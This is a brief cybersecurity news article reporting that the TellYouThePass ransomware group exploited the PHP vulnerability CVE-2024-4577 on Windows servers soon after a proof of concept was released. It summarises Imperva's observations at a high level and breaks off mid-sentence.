Ransomware Gang TellYouThePass Exploits PHP Vulnerability
Fraud Management & Cybercrime
,
Governance & Risk Management
,
Patch Management
Flaw Allows Unauthenticated Attackers to Execute Arbitrary Code
A ransomware operation with a history of exploiting widespread internet vulnerabilities lost little time in making use of a critical severity vulnerability in Window installations of web-scripting language PHP.
See Also: OnDemand | Defining a Detection & Response Strategy
Imperva Threat Research in a Monday report said TellYouThePass ransomware operators began exploiting the PHP bug, tracked as CVE-2024-4577, hours after researchers released a proof-of-concept script (see: Critical PHP Vulnerability Threatens Windows Servers).
The TellYouThePass ransomware group, active since 2019, sees opportunity in cyber incidents that have system administrators globally scrambling to patch systems. It was among the cybercriminal groups to jump on the 2021 vulnerability known as Log4Shell. Security researchers say it has a history of appearing in new forms. Chinese network security firm Snagfor spotted it in March.
Imperva researchers said Monday they observed multiple hacking attempts against Windows PHP systems involving webshell uploads and efforts to deploy ransomware.
Attackers use the PHP flaw to execute arbitrary PP code by using the PHP system function to run an HTML application file hosted on a hacker-controlled web server. The…
